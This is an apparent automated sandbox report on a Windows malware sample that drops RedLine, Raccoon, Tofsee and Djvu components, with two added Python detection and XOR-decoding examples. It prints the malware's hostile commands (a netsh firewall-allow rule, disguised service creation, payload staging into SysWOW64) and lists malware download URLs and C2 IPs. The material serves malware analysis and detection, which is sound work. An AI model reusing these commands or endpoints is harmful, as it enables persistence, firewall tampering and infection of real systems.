

Windows Analysis Report V91yW08J6p.exe

Overview

General Information

Sample Name: V91yW08J6p.exe
Analysis ID: 551101
MD5: d609a21245d77dccd6d4a659cbd9466a
SHA1: a8775ccb1d6b7b941e5b37d59db5d25f4b736cf9
SHA256: a0f70f88c9a376e7c0f7e508c796bf1dbbf58ff8b172b9aff3421be63e2d7f78
Tags: exe, RedLineStealer

Detection

Djvu, Raccoon, RedLine, SmokeLoader, Tofsee, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Djvu Ransomware
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to evade analysis by executing a special instruction which causes a usermode exception
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign process
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
Connects to a URL shortener service
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evaded block containing many API calls
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Process Tree

  • System is w10x64
  • V91yW08J6p.exe (PID: 6140 cmdline: "C:\Users\user\Desktop\V91yW08J6p.exe" MD5: D609A21245D77DCCD6D4A659CBD9466A)
    • V91yW08J6p.exe (PID: 6216 cmdline: "C:\Users\user\Desktop\V91yW08J6p.exe" MD5: D609A21245D77DCCD6D4A659CBD9466A)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 7CCD.exe (PID: 808 cmdline: C:\Users\user\AppData\Local\Temp\7CCD.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
        • 76E7.exe (PID: 5964 cmdline: C:\Users\user\AppData\Local\Temp\76E7.exe MD5: 2AE79DF2C51EF858F5483314B6B83FA0)
        • 6902.exe (PID: 1716 cmdline: C:\Users\user\AppData\Local\Temp\6902.exe MD5: F4C254B2556531003266AF2D9D74B625)
          • cmd.exe (PID: 6540 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ejdjvovs\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4788 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5636 cmdline: C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 1496 cmdline: C:\Windows\System32\sc.exe" description ejdjvovs "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 1472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 6252 cmdline: "C:\Windows\System32\sc.exe" start ejdjvovs MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 6856 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 768F.exe (PID: 4640 cmdline: C:\Users\user\AppData\Local\Temp\768F.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 768F.exe (PID: 6952 cmdline: C:\Users\user\AppData\Local\Temp\768F.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 768F.exe (PID: 1548 cmdline: C:\Users\user\AppData\Local\Temp\768F.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • E6AF.exe (PID: 6828 cmdline: C:\Users\user\AppData\Local\Temp\E6AF.exe MD5: 27F38096E53A91C525B0700700CEE4C4)
        • FF1A.exe (PID: 3120 cmdline: C:\Users\user\AppData\Local\Temp\FF1A.exe MD5: C80F38DA2951D491B7EDF24F89235293)
          • FF1A.exe (PID: 3400 cmdline: C:\Users\user\AppData\Local\Temp\FF1A.exe MD5: C80F38DA2951D491B7EDF24F89235293)
        • 2D5.exe (PID: 5640 cmdline: C:\Users\user\AppData\Local\Temp\2D5.exe MD5: C388DB9CA136D19310B76EF81E54FC12)
        • 4ED.exe (PID: 6156 cmdline: C:\Users\user\AppData\Local\Temp\4ED.exe MD5: 7FE15A5F306240209441F528BE0F5783)
          • AppLaunch.exe (PID: 5756 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
        • backgroundTaskHost.exe (PID: 5964 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca MD5: B7FC4A29431D4F795BBAB1FB182B759A)
        • 1365.exe (PID: 4248 cmdline: C:\Users\user\AppData\Local\Temp\1365.exe MD5: DC36EBFC2796806A965589566C81E2A1)
        • 28B3.exe (PID: 5064 cmdline: C:\Users\user\AppData\Local\Temp\28B3.exe MD5: B5536B068BB1098A1030F8C7DF17BFD2)
        • 2941.exe (PID: 6996 cmdline: C:\Users\user\AppData\Local\Temp\2941.exe MD5: 5263F286E45A03C8309FC8BB49E0F19A)
  • adiicvb (PID: 5872 cmdline: C:\Users\user\AppData\Roaming\adiicvb MD5: D609A21245D77DCCD6D4A659CBD9466A)
    • adiicvb (PID: 6676 cmdline: C:\Users\user\AppData\Roaming\adiicvb MD5: D609A21245D77DCCD6D4A659CBD9466A)
  • qxoxlxqh.exe (PID: 5788 cmdline: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d"C:\Users\user\AppData\Local\Temp\6902.exe" MD5: EAE6D58C8C1CB389453AF3692BF58DA8)
    • svchost.exe (PID: 2224 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 6532 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • vsiicvb (PID: 6728 cmdline: C:\Users\user\AppData\Roaming\vsiicvb MD5: 277680BD3182EB0940BC356FF4712BEF)
  • svchost.exe (PID: 5668 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.807939940.00000000005B0000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000026.00000000.927572070.0000000000400000.00000040.00000001.sdmp | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth |
  • 0xe23ea:$s1: http://
  • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
  • 0xe23ea:$f1: http://
00000026.00000000.927572070.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security |
0000000B.00000003.814707254.0000000000600000.00000004.00000001.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
00000025.00000002.1069240289.00000000007B4000.00000004.00000020.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(5 of 44 entries shown)
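The SUSP_XORed_URL_in_EXE strings above are worth decoding by hand: E8 F4 F4 F0 BA AF AF is "http://" with every byte XORed by 0x80, and E8 F4 F4 F0 F3 BA AF AF is "https://" under the same key, so the Djvu image at 0x400000 carries its URLs under a single-byte XOR. The block below is an added example written for this page (it is not Joe Sandbox code and not the YARA rule itself): it brute-forces the key over a buffer, then decodes forward from each hit until a byte that is not URL-safe, which is how you get the full URL rather than just the scheme. The buffer is constructed; the only bytes taken from the report are the two patterns above, which the block reproduces. Key 0x00 is skipped on purpose, since it would only find plaintext URLs (the $s1 hit at 0xe23ea is such a plaintext match).

```python
"""Recover single-byte-XOR-encoded URLs from a memory dump or PE image.

Added example for this report, not Joe Sandbox's or the YARA rule author's
code. The bytes E8 F4 F4 F0 BA AF AF reported above are "http://" XORed with
0x80; this brute-forces all 255 non-zero keys over a buffer and decodes the
run that follows each hit. SAMPLE_BUFFER is constructed for the demo; the
report's memory dump is not reproduced here.
"""
from __future__ import annotations

from typing import NamedTuple

SCHEMES = (b"http://", b"https://")
# Bytes allowed in the decoded run (RFC 3986 unreserved + reserved + '%').
URL_CHARS = frozenset(
    b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    b"-._~:/?#[]@!$&'()*+,;=%"
)


class XoredUrl(NamedTuple):
    offset: int   # where the encoded scheme starts in the buffer
    key: int      # single-byte XOR key
    decoded: str  # the URL as the malware sees it after decoding


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def find_xored_urls(buf: bytes, max_len: int = 256) -> list[XoredUrl]:
    """Try every non-zero key; key 0 would only find plaintext URLs."""
    hits: list[XoredUrl] = []
    for key in range(1, 256):
        for scheme in SCHEMES:
            needle = xor_bytes(scheme, key)
            off = buf.find(needle)
            while off >= 0:
                # Decode forward until a byte outside the URL charset. A XORed
                # NUL terminator decodes to 0x00, which ends the run.
                end = off
                while end < len(buf) and end - off < max_len and (buf[end] ^ key) in URL_CHARS:
                    end += 1
                hits.append(XoredUrl(off, key, xor_bytes(buf[off:end], key).decode("ascii")))
                off = buf.find(needle, off + 1)
    return sorted(hits)


# Constructed sample: a fake MZ header, two URLs XORed (together with their
# NUL terminators) under keys 0x80 and 0x5A, and one plaintext URL as control.
SAMPLE_BUFFER = (
    b"MZ\x90\x00" + b"\x00" * 8
    + xor_bytes(b"http://example.invalid/update.bin\x00", 0x80)
    + b"\xff" * 4
    + xor_bytes(b"https://c2.example.invalid/gate.php\x00", 0x5A)
    + b"\x00" * 4
    + b"plain http://legit.example.invalid/ text"
)


if __name__ == "__main__":
    for hit in find_xored_urls(SAMPLE_BUFFER):
        print(f"0x{hit.offset:x}: key=0x{hit.key:02x} {hit.decoded}")
```

On a real dump, feed the whole mapped image (or the .unpack file Joe Sandbox produces) as `buf`; a single key shared by several hits, as with the four 0x80 hits in the report, is the usual sign that the family XORs all of its strings with one constant, and decoding the run past the scheme gives you the C2 host without waiting for the sample to resolve it.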

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.V91yW08J6p.exe.5415a0.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
13.2.768F.exe.391ba90.2.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
11.2.6902.exe.400000.0.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
13.2.768F.exe.37df910.1.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
26.3.qxoxlxqh.exe.d70000.0.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security |
(5 of 15 entries shown)

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started; Author: David Burkett; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d"C:\Users\user\AppData\Local\Temp\6902.exe", ParentImage: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe, ParentProcessId: 5788, ProcessCommandLine: svchost.exe, ProcessId: 2224
Sigma detected: Copying Sensitive Files with Credential Data
Source: Process started; Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\6902.exe, ParentImage: C:\Users\user\AppData\Local\Temp\6902.exe, ParentProcessId: 1716, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs\, ProcessId: 4788
Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d"C:\Users\user\AppData\Local\Temp\6902.exe", ParentImage: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe, ParentProcessId: 5788, ProcessCommandLine: svchost.exe, ProcessId: 2224
Sigma detected: Netsh Port or Application Allowed
Source: Process started; Author: Markus Neis, Sander Wiebing; Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\6902.exe, ParentImage: C:\Users\user\AppData\Local\Temp\6902.exe, ParentProcessId: 1716, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 6856
Sigma detected: New Service Creation
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\6902.exe, ParentImage: C:\Users\user\AppData\Local\Temp\6902.exe, ParentProcessId: 1716, ProcessCommandLine: C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 5636
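Taken together, the Sigma hits above and the sc.exe / netsh.exe / cmd.exe lines in the process tree are one install chain for the Tofsee component (6902.exe): the payload is moved from the user's Temp directory into a freshly created sub-directory of SysWOW64, registered as an auto-start service named ejdjvovs, the firewall is opened inbound for SysWOW64\svchost.exe, and the service binary then spawns a bare "svchost.exe" with no -k group. The block below is an added example written for this page, not Joe Sandbox's code and not the Sigma rules themselves: each check is my own paraphrase of the corresponding rule (the real rules carry more exclusions), plus a check for the cmd.exe move that the "Copying Sensitive Files" rule only fired on by coincidence. The events are constructed from the report's process tree, with Sysmon Event ID 1 field names, and one benign svchost.exe launch is included as a control.

```python
"""Process-creation checks paraphrasing the Sigma hits listed above.

Added example, not Joe Sandbox's or the Sigma project's code: each check is my
own reading of one rule (the real rules carry more exclusions), plus one check
for the cmd.exe "move" that staged the service binary. SAMPLE_EVENTS is
constructed from the report's process tree using Sysmon Event ID 1 field names.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe"}
SERVICE_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64",
                r"c:\program files", r"c:\program files (x86)"}
USER_TEMP_RE = re.compile(r"\\appdata\\local\\temp\\", re.I)
SC_CREATE_RE = re.compile(r'\bsc(?:\.exe)?"?\s+create\s+(\S+).*?binpath=\s*"?([^"]+?\.exe)', re.I | re.S)
NETSH_PROGRAM_RE = re.compile(r'\bprogram="?([^"\s]+)', re.I)
CMD_MOVE_RE = re.compile(r'\b(?:move|copy)\b\s+(?:/y\s+)?"?([^"]+?)"?\s+"?([^"]+?)"?\s*$', re.I)

@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    detail: str

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def dirname(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[0].lower()

def service_binpath_is_suspicious(binpath: str, cmdline: str) -> bool:
    """Image outside the usual service directories (a fresh sub-directory of
    SysWOW64 counts) or a command line that points into the user's Temp."""
    return dirname(binpath) not in SERVICE_DIRS or bool(USER_TEMP_RE.search(cmdline))

def check_svchost(ev: dict) -> list[Alert]:
    """Suspect Svchost Activity (no -k group); Suspicious Svchost Process (bad parent)."""
    if basename(ev["Image"]) != "svchost.exe":
        return []
    alerts = []
    if " -k " not in f" {ev['CommandLine'].lower()} ":
        alerts.append(Alert("Suspect Svchost Activity", ev["ProcessId"], "started without -k <group>"))
    if basename(ev["ParentImage"]) not in SVCHOST_PARENTS:
        alerts.append(Alert("Suspicious Svchost Process", ev["ProcessId"], f"parent {ev['ParentImage']}"))
    return alerts

def check_service_creation(ev: dict) -> list[Alert]:
    m = SC_CREATE_RE.search(ev["CommandLine"])
    if basename(ev["Image"]) != "sc.exe" or not m:
        return []
    name, binpath = m.groups()
    flag = "suspicious" if service_binpath_is_suspicious(binpath, ev["CommandLine"]) else "standard"
    return [Alert("New Service Creation", ev["ProcessId"], f"{name} -> {binpath} ({flag} binPath)")]

def check_netsh_allow(ev: dict) -> list[Alert]:
    cl = ev["CommandLine"]
    if basename(ev["Image"]) != "netsh.exe" or not re.search(r"\badd\s+rule\b.*\baction=allow\b", cl, re.I):
        return []
    m = NETSH_PROGRAM_RE.search(cl)
    program = m.group(1) if m else "<any>"
    # Built-in Windows rules for svchost.exe always carry a service= restriction.
    note = ""
    if basename(program) == "svchost.exe" and not re.search(r"\bservice=", cl, re.I):
        note = " (svchost.exe allowed without a service= restriction)"
    return [Alert("Netsh Port or Application Allowed", ev["ProcessId"], f"program={program}{note}")]

def check_temp_to_windir(ev: dict) -> list[Alert]:
    m = CMD_MOVE_RE.search(ev["CommandLine"])
    if basename(ev["Image"]) != "cmd.exe" or not m:
        return []
    src, dst = m.groups()
    if USER_TEMP_RE.search(src) and dst.lower().startswith("c:\\windows\\"):
        return [Alert("Executable staged from user Temp into Windows directory", ev["ProcessId"], f"{src} -> {dst}")]
    return []

CHECKS = (check_svchost, check_service_creation, check_netsh_allow, check_temp_to_windir)

def run_checks(events: list[dict]) -> list[Alert]:
    return [a for ev in events for check in CHECKS for a in check(ev)]

T = r"C:\Users\user\AppData\Local\Temp"
SAMPLE_EVENTS = [  # constructed from the process tree; the last event is a benign control
    {"ProcessId": 4788, "Image": r"C:\Windows\SysWOW64\cmd.exe", "ParentImage": T + r"\6902.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /C move /Y "' + T + r'\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs' + "\\"},
    {"ProcessId": 5636, "Image": r"C:\Windows\SysWOW64\sc.exe", "ParentImage": T + r"\6902.exe",
     "CommandLine": r'C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"'
                    + T + r'\6902.exe\"" type= own start= auto DisplayName= "wifi support'},
    {"ProcessId": 6252, "Image": r"C:\Windows\SysWOW64\sc.exe", "ParentImage": T + r"\6902.exe",
     "CommandLine": r'"C:\Windows\System32\sc.exe" start ejdjvovs'},
    {"ProcessId": 6856, "Image": r"C:\Windows\SysWOW64\netsh.exe", "ParentImage": T + r"\6902.exe",
     "CommandLine": r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul'},
    {"ProcessId": 2224, "Image": r"C:\Windows\SysWOW64\svchost.exe", "ParentImage": r"C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe",
     "CommandLine": "svchost.exe"},
    {"ProcessId": 6532, "Image": r"C:\Windows\System32\svchost.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
]

if __name__ == "__main__":
    for a in run_checks(SAMPLE_EVENTS):
        print(f"[{a.rule}] pid={a.pid}: {a.detail}")
```

The parsing is deliberately tolerant of the broken quoting in the sc.exe command line (the stray `"` after `sc.exe` and the escaped quotes around the /d argument), because that is how the sandbox recorded it and how an EDR would see it; a rule that assumes well-formed arguments misses exactly this sample. The svchost control event shows why both svchost checks are needed: a legitimate launch has a `-k` group and services.exe as parent, while the Tofsee child has neither.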

Jbx Signature Overview

AV Detection:

Yara detected Raccoon Stealer
Source: Yara match; File source: 00000021.00000002.1065071680.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000003.885517058.0000000004950000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://unicupload.top/install5.exe; URL Reputation: Label: phishing
Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exe; Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/game.exe; Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/9993_1641737702_2517.exe; Avira URL Cloud: Label: malware
Source: http://unic11m.top/install1.exe; Avira URL Cloud: Label: malware
Source: http://78.46.160.87/mozglue.dll; Avira URL Cloud: Label: malware
Source: http://185.7.214.171:8080/6.php; URL Reputation: Label: malware
Source: http://unicupload.top/install1.exe; Avira URL Cloud: Label: malware
Source: http://78.46.160.87/565; Avira URL Cloud: Label: malware
Source: http://78.46.160.87/freebl3.dll; Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\E6AF.exe; Avira: detection malicious, Label: TR/AD.StellarStealer.rfurr
Source: C:\Users\user\AppData\Local\Temp\768F.exe; Avira: detection malicious, Label: HEUR/AGEN.1211353
Multi AV Scanner detection for submitted file
Source: V91yW08J6p.exe; ReversingLabs: Detection: 46%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\768F.exe; ReversingLabs: Detection: 67%
Machine Learning detection for sample
Source: V91yW08J6p.exe; Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\FF1A.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7CCD.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1365.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E6AF.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6902.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2D5.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\vsiicvb; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2941.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\adiicvb; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\768F.exe; Joe Sandbox ML: detected
Source: 26.3.qxoxlxqh.exe.d70000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.76E7.exe.20d0e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.6902.exe.600000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 11.2.6902.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 8.3.76E7.exe.20f0000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 26.2.qxoxlxqh.exe.d50e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 11.2.6902.exe.5e0e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 26.2.qxoxlxqh.exe.db0000.2.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 26.2.qxoxlxqh.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
